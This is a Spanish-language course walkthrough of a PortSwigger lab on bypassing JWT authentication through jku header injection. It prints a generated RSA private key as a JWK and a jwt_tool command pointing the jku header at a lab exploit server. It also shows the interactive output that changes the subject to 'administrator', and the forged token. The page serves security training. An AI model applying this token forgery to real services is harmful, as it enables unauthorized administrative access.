😎
WEB
YouTubeTwitterLinkedIn
  • La Biblia del Hacking en Web
    • ADVERTENCIA
    • Conoce a tu academia
    • Conoce a tu instructor
    • Aprende Hacking Web con los laboratorios de PortSwigger
  • SQL Injection
    • ¿SQL Injection?
    • Lab 1: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
    • Lab 2: SQL injection vulnerability allowing login bypass
    • Lab 3: SQL injection attack, querying the database type and version on Oracle
    • Lab 4: SQL injection attack, querying the database type and version on MySQL and Microsoft
    • Lab 5: SQL injection attack, listing the database contents on non-Oracle databases
    • Lab 6: SQL injection attack, listing the database contents on Oracle
  • Cross Site Scripting
    • ¿XSS?
    • Lab 1: Reflected XSS into HTML context with nothing encoded
    • Lab 2: Stored XSS into HTML context with nothing encoded
    • Lab 3: DOM XSS in document.write sink using source location.search
    • Lab 4: DOM XSS in innerHTML sink using source location.search
    • Lab 5: DOM XSS in jQuery anchor href attribute sink using location.search source
  • ClickJacking
    • ¿Clickjacking?
    • Lab 1: Basic clickjacking with CSRF token protection
  • Access control vulnerabilities
    • ¿Control de Acceso?
    • Lab 1: Unprotected admin functionality
    • Lab 3: User role controlled by request parameter
  • Path traversal
    • ¿Path Traversal?
    • Lab 1: File path traversal, simple case
    • Lab 2: File path traversal, traversal sequences blocked with absolute path bypass
    • Lab 3: File path traversal, traversal sequences stripped non-recursively
  • XML external entity (XXE) injection
    • ¿XML external entity?
    • Lab 1: Exploiting XXE using external entities to retrieve files
    • Lab 2: Exploiting XXE to perform SSRF attacks
    • Lab 3: Blind XXE with out-of-band interaction
  • JWT
    • ¿JWT?
    • Lab 1: JWT authentication bypass via unverified signature
    • Lab 2: JWT authentication bypass via flawed signature verification
    • Lab 3: JWT authentication bypass via weak signing key
    • Lab 4: JWT authentication bypass via jwk header injection
    • Lab 5: JWT authentication bypass via jku header injection
  • Server-side request forgery (SSRF)
    • ¿SSRF?
    • Lab 1: Basic SSRF against the local server
  • OS command injection
    • ¿OS Command Injection?
    • Lab 1: OS command injection, simple case
  • Authentication
    • ¿Authentication?
    • Lab 1: Username enumeration via different responses
  • HTTP request smuggling
    • ¿HTTP request smuggling?
    • Lab 1: HTTP request smuggling, confirming a CL.TE vulnerability via differential responses
  • Server-side template injection
    • ¿Server-side template injection?
    • Lab 1: Basic server-side template injection
  • DOM-based vulnerabilities
    • Lab 1: DOM XSS using web messages
    • Lab 2: DOM XSS using web messages and a JavaScript URL
  • WebSockets
    • Lab #1: Manipulating WebSocket messages to exploit vulnerabilities
  • Prototype pollution
    • ¿Prototype Pollution?
    • Lab 1: Client-side prototype pollution via browser APIs
      • Utilizando DOM Invader
    • Lab 2: DOM XSS via client-side prototype pollution
    • Lab 3: DOM XSS via an alternative prototype pollution vector
      • Utilizando DOM Invader
    • Lab 4: Client-side prototype pollution via flawed sanitization
    • Lab 5: Client-side prototype pollution in third-party libraries
    • Lab 6: Privilege escalation via server-side prototype pollution
    • Lab 7: Detecting server-side prototype pollution without polluted property reflection
    • Lab 8: Bypassing flawed input filters for server-side prototype pollution
    • Lab 9: Remote code execution via server-side prototype pollution
    • Lab 10: Exfiltrating sensitive data via server-side prototype pollution
  • GraphQL
    • Lab 1: Accessing private GraphQL posts
  • Web cache poisoning
    • Lab 1: Web cache poisoning with an unkeyed header
  • CORS
    • Lab #2 - CORS vulnerability with trusted null origin
    • Lab 3: CORS vulnerability with trusted insecure protocols
  • API testing
    • Lab #1: Exploiting an API endpoint using documentation
    • Lab #2: Exploiting server-side parameter pollution in a query string
    • Lab #3: Finding and exploiting an unused API endpoint
    • Lab #4: Exploiting a mass assignment vulnerability
    • Lab #5: Exploiting server-side parameter pollution in a REST URL
Con tecnología de GitBook
En esta página

¿Te fue útil?

  1. JWT

Lab 5: JWT authentication bypass via jku header injection

https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection

AnteriorLab 4: JWT authentication bypass via jwk header injectionSiguiente¿SSRF?

Última actualización hace 11 meses

¿Te fue útil?

Primero generamos una RSA Key con nuestra extension de Burp:

Copiamos el valor de la key:

{
    "p": "-2zNrL29VeM4PqJnXu9QEvxq5AYkfZCkPB1IBoh6vVWo0v5xk-oLAsrSa6oT0yfBXa1FLyJC1CqbC8xCaQrY1ei_hAEF2puKdS0MeeU-aruBkYZRZT4iX4-R9XT1FcLJVQqss8d-jwYCJJEntxjMWrktBua0n1YDEtcglaJb0Yk",
    "kty": "RSA",
    "q": "6MucFLHMg1fMOXVT5VE1lpCFYzSyTl99LiaXlZQ3d4GuFrNcryJ4W0F2lWRs26xmGb47r4fQNZjxmLj0GNmPFaMco_Wxv1M97SUKnLPpKGfdBlWn2MS8CaRIPumNFiZEllVOUu7fUmeUcHLho478BBoeC5KDGxMWMi5G4OnkD5M",
    "d": "BOFvj7BABdLLw5vX12KUrA1Bi-ruXhE9aph_9iBjstzQcHUOaRS1-O9_UmS5jdoNrCA3IbP2JZjjzpj-JLaX0uJAaYW35nxUfjAYcWd9jFokihNBrsN8NQz99VSLnvDazEJFOYavCFh0k-MNBd4xIfpjDevKbvvQTfSMF3f2ofjuDQA70RZw_qMy3QcpCYmTlNZAPi5Mth2jbCf_WlOngkrRo2T1weDTguUvDjhugQZsxChQ23vmSqVUN3-AdQnCwbxi1vITb9RoLRHdYa58kFKmd3MhaUSXocT6g8qW3-AmOphg3ub8rCzNn88TAinTO6X8se9N97kDDObQf7hj8Q",
    "e": "AQAB",
    "kid": "9c18e60f-cfa2-4858-8988-0f5f9b93426e",
    "qi": "XDDFqQi2s5ug1VPz-PNkF4u-U7VXwh-yozyl-x7EaSAU-VP3pMMJFIxZ-SHQPa_3sZCN5sMmI-UIPzLp0Yvgi3rJ5p1jSBrSh16zWxecdX-_7Qikm30dorpOVbIiJfgAxzVDIJY9zqJOCZ0v1ilhTt6zm8eihdDtt97pH5AbpyQ",
    "dp": "4tpdCUt5lhEaIoluM55B5Z-S4oMYUaM8THEvF5X1CPhNB3NFD2zQ2ogeK76dfJwWQGuiTNDg84YttwtpsFV1KCyFAJnbqk9FMkyfQSyykKL2WVOUBYF2ijqEO7B3olbKSc0D3oJVkr6dGFlQOEhLul_yXJO0zT9SLqGkaN7BceE",
    "dq": "4Rc-q6PfI4BZL5WKsUh8kEDdOLdTUQRzfZRDLZZKq3rwYXK8Q3sI9POvPXQE7cMcVffiri6b27cuo4TyQLTb7QfyQXbnjx9l2U7fm_U5lKAYzm80BBz11DzMvkgE603FM7b4LKhbtsoAdVofYo52j2DRfE8GBb_Gzm6AiiidI5E",
    "n": "5KKS9kRidf516xFIgURD0j1pERrzjnnGgwEEUsZTq-tgqtF_M5_w7ic03Q7P-s31DbQbbuhd-ZomVWsu-V09NIgDnk7x8oBFQ6FT5l6YlUL0JUrMN9eN6eUaOeqU26wkzSRR8Ppt-yYMI8wyrDsa7imLT2NtYqz560uVI1Ok3D6lzxBslo_m-BRMN5NjHyXMZNVkxRgahAx4UU71pwlHUCvl5A3JVRVHrCknvbYQoLi4fLgihCbCf5dp7r7TPNQ2HP7Ym5LkBormtUbuQgc7FgzxLPanqwkHXsiBux6Qo4X6hCPq8xe362NPCx4uanOJXX1GD9EN26U2u3PL6wRYqw"
}

Creamos el jwks:

El body del exploit debe estar dentro de un array asi:

{
    "keys": [
{
    "p": "-2zNrL29VeM4PqJnXu9QEvxq5AYkfZCkPB1IBoh6vVWo0v5xk-oLAsrSa6oT0yfBXa1FLyJC1CqbC8xCaQrY1ei_hAEF2puKdS0MeeU-aruBkYZRZT4iX4-R9XT1FcLJVQqss8d-jwYCJJEntxjMWrktBua0n1YDEtcglaJb0Yk",
    "kty": "RSA",
    "q": "6MucFLHMg1fMOXVT5VE1lpCFYzSyTl99LiaXlZQ3d4GuFrNcryJ4W0F2lWRs26xmGb47r4fQNZjxmLj0GNmPFaMco_Wxv1M97SUKnLPpKGfdBlWn2MS8CaRIPumNFiZEllVOUu7fUmeUcHLho478BBoeC5KDGxMWMi5G4OnkD5M",
    "d": "BOFvj7BABdLLw5vX12KUrA1Bi-ruXhE9aph_9iBjstzQcHUOaRS1-O9_UmS5jdoNrCA3IbP2JZjjzpj-JLaX0uJAaYW35nxUfjAYcWd9jFokihNBrsN8NQz99VSLnvDazEJFOYavCFh0k-MNBd4xIfpjDevKbvvQTfSMF3f2ofjuDQA70RZw_qMy3QcpCYmTlNZAPi5Mth2jbCf_WlOngkrRo2T1weDTguUvDjhugQZsxChQ23vmSqVUN3-AdQnCwbxi1vITb9RoLRHdYa58kFKmd3MhaUSXocT6g8qW3-AmOphg3ub8rCzNn88TAinTO6X8se9N97kDDObQf7hj8Q",
    "e": "AQAB",
    "kid": "9c18e60f-cfa2-4858-8988-0f5f9b93426e",
    "qi": "XDDFqQi2s5ug1VPz-PNkF4u-U7VXwh-yozyl-x7EaSAU-VP3pMMJFIxZ-SHQPa_3sZCN5sMmI-UIPzLp0Yvgi3rJ5p1jSBrSh16zWxecdX-_7Qikm30dorpOVbIiJfgAxzVDIJY9zqJOCZ0v1ilhTt6zm8eihdDtt97pH5AbpyQ",
    "dp": "4tpdCUt5lhEaIoluM55B5Z-S4oMYUaM8THEvF5X1CPhNB3NFD2zQ2ogeK76dfJwWQGuiTNDg84YttwtpsFV1KCyFAJnbqk9FMkyfQSyykKL2WVOUBYF2ijqEO7B3olbKSc0D3oJVkr6dGFlQOEhLul_yXJO0zT9SLqGkaN7BceE",
    "dq": "4Rc-q6PfI4BZL5WKsUh8kEDdOLdTUQRzfZRDLZZKq3rwYXK8Q3sI9POvPXQE7cMcVffiri6b27cuo4TyQLTb7QfyQXbnjx9l2U7fm_U5lKAYzm80BBz11DzMvkgE603FM7b4LKhbtsoAdVofYo52j2DRfE8GBb_Gzm6AiiidI5E",
    "n": "5KKS9kRidf516xFIgURD0j1pERrzjnnGgwEEUsZTq-tgqtF_M5_w7ic03Q7P-s31DbQbbuhd-ZomVWsu-V09NIgDnk7x8oBFQ6FT5l6YlUL0JUrMN9eN6eUaOeqU26wkzSRR8Ppt-yYMI8wyrDsa7imLT2NtYqz560uVI1Ok3D6lzxBslo_m-BRMN5NjHyXMZNVkxRgahAx4UU71pwlHUCvl5A3JVRVHrCknvbYQoLi4fLgihCbCf5dp7r7TPNQ2HP7Ym5LkBormtUbuQgc7FgzxLPanqwkHXsiBux6Qo4X6hCPq8xe362NPCx4uanOJXX1GD9EN26U2u3PL6wRYqw"
}
    ]
}

Luego de lo anterior, modificamos el JWT y lo firmamos:

El resultado final es el siguiente:

El JWT final queda asi:

Utilizando JWT_TOOL

Ejecutamos el siguiente comando:

┌──(root㉿SPARTAN-SERVER)-[/home/hacker/BURP/jwt_tool]
└─# python3 jwt_tool.py eyJraWQiOiJiNjRhYThjYy01NmY5LTRlNzQtODE2My04ZmMyNTUwM2E1MmUiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTcxNzQ2OTcxMywic3ViIjoid2llbmVyIn0.VxY8S44qihjURqTa00DJbKlmPxktWH8r02CdNjBMHkCQOYRWDq1ydQEZkY82b5h63XFX7RJ8rWHPbDF9MlV84LvIOl-pmiPt-Pd6F73JIuwECjMfQjMDnzpa9Wb0P_KCsFqSRK2VA5U6Yxr7g3fNx4q9tk0EH3rCqro3KTauFHHkXELoB4u6DOU9Ue6YguHygf2xJzPjnXnoqX_lxVF5ToGcSPgPeToJO67ObvBZHTybw886YVb0gxMKjVpQqGpxaAY2sVB7sgFT1GzzaMs7H120SKqcpsTYIkSPVHLKzusbpWW19jRYycQBVOWbfqHBTMapvi9en-FMjK8COGMtgg -X s -ju https://exploit-0a04005b04094f4380a57570013900eb.exploit-server.net/jwks.json -T

        \   \        \         \          \                    \
   \__   |   |  \     |\__    __| \__    __|                    |
         |   |   \    |      |          |       \         \     |
         |        \   |      |          |    __  \     __  \    |
  \      |      _     |      |          |   |     |   |     |   |
   |     |     / \    |      |          |   |     |   |     |   |
\        |    /   \   |      |          |\        |\        |   |
 \______/ \__/     \__|   \__|      \__| \______/  \______/ \__|
 Version 2.2.7                \______|             @ticarpi

Original JWT:


====================================================================
This option allows you to tamper with the header, contents and
signature of the JWT.
====================================================================

Token header values:
[1] kid = "b64aa8cc-56f9-4e74-8163-8fc25503a52e"
[2] alg = "RS256"
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 1

Current value of kid is: b64aa8cc-56f9-4e74-8163-8fc25503a52e
Please enter new value and hit ENTER
> jwt_tool
[1] kid = "jwt_tool"
[2] alg = "RS256"
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 0

Token payload values:
[1] iss = "portswigger"
[2] exp = 1717469713    ==> TIMESTAMP = 2024-06-03 21:55:13 (UTC)
[3] sub = "wiener"
[4] *ADD A VALUE*
[5] *DELETE A VALUE*
[6] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 3

Current value of sub is: wiener
Please enter new value and hit ENTER
> administrator
[1] iss = "portswigger"
[2] exp = 1717469713    ==> TIMESTAMP = 2024-06-03 21:55:13 (UTC)
[3] sub = "administrator"
[4] *ADD A VALUE*
[5] *DELETE A VALUE*
[6] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 0
Paste this JWKS into a file at the following location before submitting token request: https://exploit-0a04005b04094f4380a57570013900eb.exploit-server.net/jwks.json
(JWKS file used: /root/.jwt_tool/jwttool_custom_jwks.json)
/root/.jwt_tool/jwttool_custom_jwks.json
jwttool_a9bbfc25f396c70765690e2419b03758 - Signed with JWKS at https://exploit-0a04005b04094f4380a57570013900eb.exploit-server.net/jwks.json
[+] eyJraWQiOiJqd3RfdG9vbCIsImFsZyI6IlJTMjU2Iiwiamt1IjoiaHR0cHM6Ly9leHBsb2l0LTBhMDQwMDViMDQwOTRmNDM4MGE1NzU3MDAxMzkwMGViLmV4cGxvaXQtc2VydmVyLm5ldC9qd2tzLmpzb24ifQ.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTcxNzQ2OTcxMywic3ViIjoiYWRtaW5pc3RyYXRvciJ9.gi-MLU-HNg0IE5G1txdAoFaBIH5sI8MPnG39RcRp-Oo6w72Akl6e2pEhP-Nt2RsPGf5hsnecEyB1LLpmxXqx1feYh2SZVSBTU1QmgkjfJz95J_sVh9ZNVGqRiHjAvnQLNhBBE4a3F3sZTiUJHvLDPza880FlbCLVHR4f57TAUNzqt1Ed-jXUYANXx4RDqnnkh-g6PIpLQ3ZUsXyLIYwmdAwgGthqFlihMtGxAd0uRpJZScvYtefyzOdmd9K5mzpJgvixOe6WaShdmZ1Dk8olDvrbGpaHiPkvb3zPaMuKLc7V9-F7zbluL7UfbwwzQJjU749tmvdGgOIJPD1y-2pLfQ

Luego de lo anterior, hay que modificar el exploit:

┌──(root㉿SPARTAN-SERVER)-[/home/hacker/BURP/jwt_tool]
└─# cat /root/.jwt_tool/jwttool_custom_jwks.json
{
    "keys":[
        {
            "kty":"RSA",
            "kid":"jwt_tool",
            "use":"sig",
            "e":"AQAB",
            "n":"pj6JLmRpdPRRPuh7RS2ir3CcDrmwILr4Ffj-AR0VCCN-hbN_R2RquIlVeP7bOTMhSYk2SG0Jvnmjkr0i3sMVMTi64L3vRDEuY3e7O1bRjFrrfKw4hNn5svGf-xN74JnPFJEqvvIEyek-BX5eo7sHlP1maDta3H98RX0BckNxjRS0eXfyxG_q-K75DD6SNX-hxR00Wx60KXkLV5WvCKN-b34uMc_TXN3jBZO2xpQ1l7WlJ1fFis9-miF222oZ9irsf1OY4B66JBi_0QbOv67l_YhM1j_uwgmE4NOIYA2VpiHQjHBinFan8WNjDOXKAoy3_Kf0QtnTjOWUWQ08SkUzWQ"
        }
    ]
}

Modificamos el exploit:

Y listo:

El JWT final quedo asi: